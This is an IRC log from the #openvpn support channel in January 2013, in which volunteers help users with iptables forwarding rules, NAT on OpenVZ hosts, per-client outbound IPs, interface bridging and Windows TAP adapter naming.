12:37 <@EugeneKay> I think you can do that with ebtables/iptables
12:38 -!- MarKsaitis [~MarKsaiti@82-71-61-117.dsl.in-addr.zen.co.uk] has joined #openvpn
12:38 < _fang0654> I'd love to not use bridging, but the software only works on the same subnet
12:38 -!- ch1mk3y [ch1m@ns203993.ovh.net] has joined #openvpn
12:38 < _fang0654> ok. I'll see if I can get more with my google fu. Mainly just trying to have a different default gateway assigned
12:39 -!- CEnnis91|Cloud [uid3543@gateway/web/irccloud.com/x-pzipuahktqrozmve] has quit [Quit: Connection closed for inactivity]
12:39 < _fang0654> Although it is only a handful of machines. I think I'll just set them up static and be done with it
12:40 < JackWinter> is there a more specific directive than client-to-client, to only allow select hosts to see each other?
12:40 < _fang0654> JackWinter: You have to do that through iptables on the server
12:41 -!- ch1mkey [ch1m@ns203993.ovh.net] has quit [Ping timeout: 276 seconds]
12:43 < JackWinter> _fang0654: was afraid of that. does a forward rule cover traffic on the same interface or is it only for forwarding between different interfaces?
12:43 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn
12:44 -!- ch1mkey [ch1m@ns203993.ovh.net] has quit [Read error: Connection reset by peer]
12:44 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn
12:44 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds]
12:45 <+pekster> JackWinter: Traffic can be forwarded even if it arrives and leaves via the same interface, yes
12:45 -!- ch1mk3y [ch1m@ns203993.ovh.net] has quit [Ping timeout: 248 seconds]
12:46 < _fang0654> JackWinter: Hold on one sec, let me look at how my rules are configured
12:46 -!- ch1mk3y [ch1m@ns203993.ovh.net] has joined #openvpn
12:48 -!- ch1mkey [ch1m@ns203993.ovh.net] has quit [Ping timeout: 248 seconds]
12:49 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
12:51 <+pekster> _fang0654: I assume you've already ruled out using a tun (Layer 3) VPN setup instead? You actually need subnet broadcast and/or Ethernet frame support across the tunnel?
12:52 < _fang0654> pekster: Yeah, on this one. I seem to have it up and running fine, I'm just going to keep things simple and keep the workstations static
12:54 < _fang0654> JackWinter: Here is an example iptables setup I have for a specific client to only be able to access specific machines - http://pastebin.com/BxjGQFbn
12:58 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn
13:00 -!- ch1mk3y [ch1m@ns203993.ovh.net] has quit [Ping timeout: 255 seconds]
13:01 < JackWinter> _fang0654: thanks
13:02 <+pekster> I don't see the point of lines 8-9; you could just DROP the traffic there. Presumably early on in your FORWARD chain you're already accepting the established & related states, so there's no point to doing it there
13:03 -!- ch1mk3y [ch1m@ns203993.ovh.net] has joined #openvpn
13:05 -!- ch1mkey [ch1m@ns203993.ovh.net] has quit [Ping timeout: 252 seconds]
13:08 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
13:13 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds]
13:14 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
13:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
13:22 < _fang0654> pekster: I had the default set to drop.
13:24 -!- BtbN [~btbn@btbn.de] has quit [Read error: Connection reset by peer]
13:25 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: Dieser Computer ist eingeschlafen]
13:25 <+pekster> _fang0654: So? You should be accepting the established/related states early in forward, not for each source address you custom filter
13:25 -!- BtbN [~btbn@btbn.de] has joined #openvpn
13:25 <+pekster> Unless you have some special need, the first rule in any of the builtin chains should probably be -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
13:26 < _fang0654> pekster: Good point. I built the setup years ago, and haven't really touched it since. I think when I get some free time I'll update it
13:27 < _fang0654> pekster: Definitely makes more sense
13:28 <+pekster> It's just less CPU processing the kernel needs to do, because those rules are hit for every packet. I could also run around the block every glass of water I pour myself, but I don't ;)
13:29 < _fang0654> lol
13:29 < _fang0654> I'm actually kind of amazed at how well openvpn holds up running a lot of vpns
13:29 -!- jgspratt [~jgspratt@66.162.71.166] has left #openvpn ["PONG :hubbard.freenode.net"]
13:29 < _fang0654> I have a virtual machine running about 50 tunnels without breaking a sweat
13:29 <@dazo> _fang0654: you probably haven't tried a few hundred active tunnels ;-)
13:29 <+pekster> Concurrent processes, yes. It's not multi-threaded, so that surprises some people with 16 virtual cores or something when they can't leverage them all on a single tunnel
13:29 <@dazo> but 50ish should be really fine
13:30 < _fang0654> dazo: I figure when I hit 64 I'll just set up a new instance
13:30 <+pekster> The solution there is to use multiple backend VPNs and tie them together with some load-balancing at the front; if you set something like that up right, it's mostly transparent to frontend users
13:30 < _fang0654> pekster: Makes sense... especially since I only gave it a core :)
13:31 < _fang0654> pekster: It is mainly our clients, who for the most part aren't dealing with each other, so it doesn't matter if we split it up
13:31 <@dazo> _fang0654: you can easily run more openvpn servers on different ports on the same box ... and then pin them to different CPU cores ... but I would easily raise the bar to 100 simultaneous and active clients
13:32 < _fang0654> dazo: To be honest, I was a bit shortsighted when I first set it up. I'm going to run out of IPs before then and have to set up another server anyways :)
13:32 <@dazo> nah ... just reconfigure the VPN subnet ... that should be enough, or not?
13:33 < _fang0654> I'd have to do it late at night, since I can't keep it down for very long
13:34 <@dazo> fair enough
13:34 < _fang0654> I tried it once, ran into a couple of snags, backed out and shelved it to be handled at some later point
13:35 < _fang0654> Well, now I have to call the cable company to up the upstream bandwidth at this office. Apparently it's only 2Mbit up, which is killing their software
13:35 < _fang0654> thanks for the advice!
13:36 <@dazo> well, I'd set up a clone VM of my prod environment, rename it to 'testing' ... and do all the needed testing there ... and copy the config files
13:36 -!- _fang0654 [~fang0654@cpe-68-174-236-234.nyc.res.rr.com] has quit [Quit: Leaving]
13:38 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Quit: Leaving]
13:38 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
13:40 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn
13:41 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
13:48 -!- b00b [~freenode@46.166.178.155] has quit [Quit: ZNC - http://znc.in]
13:52 -!- Typo1 [~raul@63-234-144-202.dia.static.qwest.net] has joined #openvpn
13:55 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
14:05 -!- dazo is now known as dazo_afk
14:09 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 265 seconds]
14:10 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
14:13 -!- MarKsaitis [~MarKsaiti@82-71-61-117.dsl.in-addr.zen.co.uk] has quit [Ping timeout: 276 seconds]
14:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
14:21 -!- Suterusu1 [~EyeR@178.63.199.61] has quit [Ping timeout: 260 seconds]
14:25 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
14:26 -!- Devastator [~devas@177.18.197.67] has joined #openvpn
14:26 -!- Devastator [~devas@177.18.197.67] has quit [Changing host]
14:26 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
14:31 -!- CEnnis91|Cloud [uid3543@gateway/web/irccloud.com/x-glexqzbkdqwtzqzv] has joined #openvpn
14:34 -!- CEnnis91|Cloud is now known as CEnnis91
14:34 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-glexqzbkdqwtzqzv] has quit [Changing host]
14:34 -!- CEnnis91 [uid3543@unaffiliated/cennis91] has joined #openvpn
14:34 -!- CEnnis91 [uid3543@unaffiliated/cennis91] has quit [Changing host]
14:34 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-glexqzbkdqwtzqzv] has joined #openvpn
14:37 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
14:49 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
14:58 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn
15:10 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.]
15:15 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds]
15:20 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 260 seconds]
15:21 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection]
15:21 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has quit [Quit: valparaiso]
15:28 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
15:45 < CrashTM> anyone home?
15:49 -!- pa [~pa@unaffiliated/pa] has quit [Quit: Sto andando via]
15:51 -!- Typo1 [~raul@63-234-144-202.dia.static.qwest.net] has quit [Quit: Leaving.]
15:53 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
16:01 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds]
16:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn
16:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 246 seconds]
16:15 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:16 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has joined #openvpn
16:17 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 276 seconds]
16:25 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn
16:27 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
16:30 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
16:37 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 17.0.1/20121128204232]]
16:52 -!- Crosshair84 [~Crosshair@nat.crossfone.com.ar] has joined #openvpn
16:52 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 255 seconds]
16:52 -!- fu_fu is now known as desmo
16:52 < Crosshair84> hello, I'm a new user and I'm looking for help
16:52 -!- bjh4_ [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn
16:53 < desmo> crashTM what's up
16:55 < CrashTM> desmo, I'm having trouble setting up an openvpn server on my vz based ubuntu vps
16:55 < desmo> what's the trouble?
16:56 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:56 <+pekster> OpenVZ isn't going to give you direct control over tun devices like you expect
16:56 <+pekster> Try a real shell ;)
16:56 < CrashTM> Well at first it was that tun/tap was not enabled but I got that fixed, now it tells me that the ip_tables module is not found when I try to configure it
16:57 <+pekster> !openvz
16:57 <@vpnHelper> "openvz" is (#1) http://wiki.openvz.org/VPN_via_the_TUN/TAP_device to learn about openvz specific stuff with regards to openvpn or (#2) It is usually less painful to switch to a host with better virtualization technology, eg Xen.
16:57 -!- desmo is now known as fu_fu
16:57 < CrashTM> so I contacted the host, they said that it was also enabled and running for other clients
16:57 <+pekster> Or:
16:57 <+pekster> !openvzlinnat
16:57 <@vpnHelper> "openvzlinnat" is since openvz cant do NAT inside containers, use iptables -t nat -A PREROUTING -i tun0 -j DNAT --to-destination
16:57 <+pekster> !openvznat
16:57 <@vpnHelper> "openvznat" is (#1) a user reported success with this command: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to or (#2) someone else got it working with: iptables -t nat -A POSTROUTING -s / -o eth -j SNAT --to
16:57 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 260 seconds]
16:57 <+pekster> There's some reading for you CrashTM. I'd strongly suggest using a VM provider not based on OpenVZ if you want to do OpenVPN tasks
16:58 <+pekster> VZ isn't real virtualization; it's just a glorified chroot
17:00 < dioz> that isn't entirely accurate
17:00 < dioz> but a good generalization from my experience as well
17:00 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn
17:00 -!- mode/#openvpn [+o dazo_afk] by ChanServ
17:00 -!- dazo_afk is now known as dazo
17:00 <+pekster> Well, it's got some fancy PID remapping and process magic going on, but it's basically just a chroot with a few bow-ties on top :P
17:01 <+pekster> It's a cool project, just not from OpenVPN's perspective...
17:01 < dioz> true
17:01 < dioz> xen hvm or kvm is what i'd suggest
17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
17:05 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
17:12 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.]
17:13 < CrashTM> well there are not many cheap kvm vps's
17:14 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds]
17:15 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
17:16 -!- bjh4_ [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Quit: Leaving]
17:17 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn
17:18 -!- neverme [neverme@201.80.7.30] has joined #openvpn
17:19 < neverme> hi, in order to have multiple outbound ips with openvpn do I need to make several servers or is it possible to make 1 and define which outbound ip a given client will use?
17:20 <+rob0> You asked that yesterday and quit before I could answer.
17:21 <+rob0> And the answer is,
17:21 <+rob0> !notovpn
17:21 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem
17:21 -!- nutron [~nutron@unaffiliated/nutron] has quit [Ping timeout: 264 seconds]
17:21 <+rob0> For example, if Linux, it could be a matter of per-client SNAT rules.
17:23 <+rob0> Or, another choice, which should work in any OS, would be CCD files with ifconfig per client to directly use those IP addresses for the tunnel, and then proxy ARP.
17:24 < neverme> rob0 yes I was short on time thx
17:25 < neverme> I see, so rather than doing a network snat source I would do a targeted snat from client to the ip I want to use?
17:26 < neverme> I will give it a try thanks again rob0
17:26 <+pekster> That's one solution, yes. OpenVPN doesn't care what you do with a packet once it gets passed to the host OS
17:27 <+rob0> I would do the direct bind and proxy ARP approach. I hate NAT.
17:28 <+pekster> As soon as I get more than a single public IP presence, I'll hate NAT too :D
17:28 < neverme> rob0 would you have a link to a guide on doing that? I am familiar doing it on SNAT but that done that way
17:28 <+rob0> Once again, it varies by OS, and the only one I know is Linux.
17:28 < neverme> well I just need to assign different ips to 6 clients and I don't think it will increase
17:29 < neverme> well the server is on centos and the clients are windows xp
17:29 <+rob0> and I did post a proxy ARP solution on the mailing list once
17:29 < neverme> thanks I will look for that
17:30 <+rob0> it was Linux on both ends, but at least the server end would be applicable
17:32 < neverme> well worst case I will just use it with snat which I am familiar with but I will give it a try with ARP and see how different it is
17:33 < neverme> from what you said above it seems easier to manage with ARP
17:33 <+rob0> I think it is.
17:34 <+rob0> Use "rob0 openvpn static ip at home", should find it. I gtg, bbl.
17:34 <+rob0> (search terms)
17:34 < neverme> cool thanks
17:34 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
17:36 -!- Burken [~Burken@78-69-27-5-no194.tbcn.telia.com] has joined #openvpn
17:36 -!- Burken [~Burken@78-69-27-5-no194.tbcn.telia.com] has left #openvpn []
17:36 < neverme> found it on the mailing list thanks a lot rob0
17:41 -!- neverme [neverme@201.80.7.30] has quit [Quit: Leaving]
17:44 < CrashTM> root@35948:~# iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to-source
17:44 < CrashTM> WARNING: Deprecated config file /etc/modprobe.conf, all config files belong into /etc/modprobe.d/.
17:44 < CrashTM> FATAL: Module ip_tables not found.
17:44 < CrashTM> iptables v1.4.4: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
17:44 < CrashTM> Perhaps iptables or your kernel needs to be upgraded.
17:45 < CrashTM> any ideas with this
17:46 <+pekster> The system you're on doesn't provide (or expose, as may be the case with OpenVZ) the required kernel modules. netfilter does not work without access to the relevant kernel modules
17:47 < CrashTM> any idea on how to "expose" those modules
17:47 <+pekster> No clue; I'm not familiar with OpenVZ beyond a high-level understanding of how it works (in fact, that's why I choose to not be more familiar with it)
17:48 <+pekster> The reading material I had the bot paste from earlier had some wiki links to OpenVZ's site, if that's useful
17:56 < CrashTM> ok, well can you recommend a cheap vps host?
17:59 <+pekster> AWS gives you a year free if you're a new customer and stay within the "Free Tier" usage limits
17:59 < CrashTM> AWS?
17:59 <+pekster> You can run 1 VM 24/7 with that
17:59 < CrashTM> does it work with openvpn
17:59 <+pekster> http://aws.amazon.com/free/
17:59 <@vpnHelper> Title: AWS Free Usage Tier (at aws.amazon.com)
18:00 <+pekster> Yes, of course; it's a xen-based virtualization platform
18:00 <+pekster> Drop in a pre-existing VM for the Ubuntu Server (the free community edition AMI) and install/configure openvpn
18:01 <+pekster> Just be sure you understand the free tier limits, because they'll bill you à la carte if you exceed the tier limits (and after your free year you pay metered as you would normally)
18:03 < CrashTM> I'm reading about the free tier but I don't understand most of it lol
18:03 < Crosshair84> hi, I have a problem with the openvpnAS
18:03 < Crosshair84> can you help me?
18:04 <+pekster> !as
18:04 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
18:04 < Crosshair84> yes
18:04 < Crosshair84> but nothing there
18:04 <+pekster> This channel is for the open-source OpenVPN codebase, not the commercial product
18:04 <+pekster> You will not find help with AS here, only OpenVPN
18:05 <+pekster> The commercial side is separate and has their own support structure (they are a company with paid employees. This is a free community channel with volunteer help)
18:05 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has quit [Ping timeout: 240 seconds]
18:07 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn
18:14 < dioz> can I bridge a virtual interface?
18:14 < dioz> ether0:0 ?
18:14 < dioz> eth0:0 I mean
18:21 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Quit: Peace]
18:28 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Read error: Operation timed out]
18:31 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn
18:44 < Suterusu> I think that's how mine's working - But don't quote me on that
18:47 -!- joshie [~josh@joshie.net] has quit [Remote host closed the connection]
18:48 -!- joshie [~josh@joshie.net] has joined #openvpn
18:48 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
18:50 < dioz> I think I'm just gonna make the bridge in the /etc/network/interfaces
18:50 < dioz> so it's started on boot
18:51 < dioz> need to make sure I can get into this beast in a different way tho
18:51 < dioz> in case I lock myself out
18:51 < dioz> doubt I will
18:51 < dioz> but I just wanna make sure
18:52 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.]
18:54 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 252 seconds]
18:56 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn
19:07 <+pekster> dioz: The alias is just a secondary IP on the same device; I don't believe you can treat them separately from an L2 perspective
19:08 <+pekster> The newer iproute2 utilities don't even show them like that anymore; they just list all the inet addresses assigned to an adapter (either a device or a VLAN; the VLAN is treated as a unique device to the kernel)
19:10 < dioz> well I have a VPS with two ip addresses
19:10 < dioz> I wanted to route one of the ips to a VM I have on a box in a different geographical location
19:10 <+pekster> That's doable with policy routing
19:11 < dioz> gonna make the tap0 interface bridge with the eth0
19:11 < dioz> and give the tap0 the second ip
19:12 < dioz> so I don't even need the second virtual interface
19:12 < dioz> can't remember the solusvm login to this vps tho
19:12 < dioz> in case I do something dumb and need serial access
19:12 < dioz> can't find the e-mail in my inbox
19:13 <+pekster> ifconfig is the old way in Linux. 'ip addr' is preferred
19:13 < dioz> yeah
19:13 < dioz> this is how it was set up from scratch in the /etc/network/interfaces
19:13 < dioz> eth0 and eth0:0
19:13 <+pekster> Oh, yea. I try to avoid such distros when I can ;)
19:18 < thumbs> slackware has ip as well, dioz
19:18 < dioz> huh?
19:19 <+pekster> Anything modern has the ip command; their network config files still tend to use outdated syntax so it never has to change ;)
19:20 < dioz> yeah I didn't set this interfaces file up the way it is
19:20 < dioz> I'd be using ip if it was me
19:24 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
19:38 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
19:47 -!- ch1mk3y [ch1m@ns203993.ovh.net] has left #openvpn []
19:55 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
19:59 -!- gojafe [~rasengan@eyearesee.com] has quit [Quit: Lost terminal]
20:01 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
20:12 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds]
20:19 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit []
20:30 <+dvl> in openvpn, can I add a 'route 10.4.0.0 255.255.255.0', for example, to my *client* config if the server is not already pushing it?
20:31 <+dvl> ^ from another network
20:35 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 265 seconds]
20:35 <+pekster> dvl: Sure, the client can do that. The server still needs to route it, of course, but that's not internal to OpenVPN at that point
20:42 -!- Crosshair84 [~Crosshair@nat.crossfone.com.ar] has quit []
21:23 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
21:35 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn
22:05 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn
22:05 < fu_fu> hello
22:07 < fu_fu> I need a bit of help, I upgraded my windows terminal server 2008_r2 to the new version, as well as the AD server, now there is some problem logging in to the TS
22:08 < fu_fu> are there some added auth communications in the new version?
22:08 < fu_fu> i can login as administrator but login to the domain is stopped 22:17 < pppingme> fu_fu do you have ts licenses installed? 22:19 < fu_fu> ya, and license server should be fine 22:20 < fu_fu> i rebooted the servers so they would be sure to get their drivers in order, still waiting 22:20 < pppingme> did it break after you updated the OS, or after you upped it to an AD server? or did you test in between steps??? 22:20 < fu_fu> waiting for them to come back up 22:20 < fu_fu> sorry, confusion. 22:21 < fu_fu> u just updated the OVPN to 2.3 and added two TAPs 22:21 < fu_fu> *I 22:23 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 22:26 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 22:28 < fu_fu> i think there may be a problem with my identifying the TAP ID, is it just the name or the ID string used in the config file? 22:29 <+pekster> Not normally, although IIRC you can provide the CLSID of the network adapter in your config file if you want (that's uncommon to do in practice) 22:29 <+pekster> You don't know how your own host is configured? 22:30 < fu_fu> i just added the other adapters and did not need the "dev node "line 22:32 <+pekster> I don't understand why logging into a service is a problem of OpenVPN? 22:32 <+pekster> What does RDP have to do with OpenVPN? 
22:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 246 seconds] 22:36 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Remote host closed the connection] 22:38 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 22:40 < fu_fu> i was just asking if the new revision had any additional traffic allowed over the tunnel 22:41 < fu_fu> it seems to work after i disable the additional TAPs so it must be something in that 22:41 < fu_fu> the RDP connection authenticates to a domain server at the other end of a client tunnel 22:43 <+pekster> "had any additional traffic allowed over the tunnel" <-- what does that mean? 22:46 <+pekster> I mean, 2.3 supports IPv6 across the link, and perhaps that's "additional traffic", but I can't really figure out what you're asking 22:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 22:46 < fu_fu> i could authenticate before i added the TAP interfaces and upgraded 22:47 <+pekster> So the next logical question: is the VPN even up? 22:49 < fu_fu> yes, i have clients connected and pinging 22:50 < fu_fu> i think i found it, the TAP ints seem to be cleared of dns info and windows uses that for auth mapping 22:50 < fu_fu> yup, that did it 22:51 < fu_fu> driver overwrite is all, thanks 22:55 < fu_fu> so what is the standard way to find the ID of the NIC on windows? e.g. "dev node TAP0" < No. Use the display name or CLSID (see openvpn.exe --show-adapters to get that list) 23:03 <+pekster> Usually "Local Area Connection X" but you can rename the device. 
Technically you could call it 'tap0' if you wanted ;) 23:06 < fu_fu> yes, that is what i did exactly, i don't really use windows all that much so i don't know clsid but thank you for elaborating, i was thinking it might be that (987213002319788123400-812347) type of ID 23:07 <+pekster> Yes 23:08 < fu_fu> cool, well gnight folks, thanks for being here 23:08 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 23:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 255 seconds] 23:42 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 23:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn --- Day changed Thu Jan 10 2013 00:05 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 00:12 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 00:14 -!- Friberg [~Friberg@h-223-133.a176.priv.bahnhof.se] has quit [Ping timeout: 260 seconds] 00:14 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has quit [Ping timeout: 260 seconds] 00:14 -!- Friberg [~Friberg@h-223-133.a176.priv.bahnhof.se] has joined #openvpn 00:14 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn 00:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 248 seconds] 00:33 -!- ngharo_ [~ngharo@2001:1af8:4400:a049::] has joined #openvpn 00:35 -!- ngharo [~ngharo@2001:1af8:4400:a049:1:2:3:4] has quit [Quit: Reconnecting] 00:35 -!- ngharo_ is now known as ngharo 00:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 01:26 -!- cosmicgate- [~cosmicgat@113.210.99.83] has joined #openvpn 01:28 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 01:28 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 01:28 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:28 
-!- mode/#openvpn [+o krzee] by ChanServ 01:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 264 seconds] 01:42 -!- cosmicgate-- [~cosmicgat@198.147.22.172] has joined #openvpn 01:44 -!- cosmicgate- [~cosmicgat@113.210.99.83] has quit [Ping timeout: 265 seconds] 01:45 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 01:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 02:03 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 02:05 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:05 -!- Azrael808 [~peter@212.161.9.162] has quit [Remote host closed the connection] 02:15 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 02:23 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 02:23 -!- Devastator- [~devas@177.18.197.67] has joined #openvpn 02:24 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 02:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 276 seconds] 02:37 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn 02:40 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 02:45 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 03:00 -!- cosmicgate-- [~cosmicgat@198.147.22.172] has quit [Ping timeout: 255 seconds] 03:06 -!- ade_b [~Ade@109.58.166.181.bredband.tre.se] has joined #openvpn 03:06 -!- ade_b [~Ade@109.58.166.181.bredband.tre.se] has quit [Changing host] 03:06 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:22 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 240 seconds] 03:31 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 03:32 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 252 seconds] 03:34 -!- defswork 
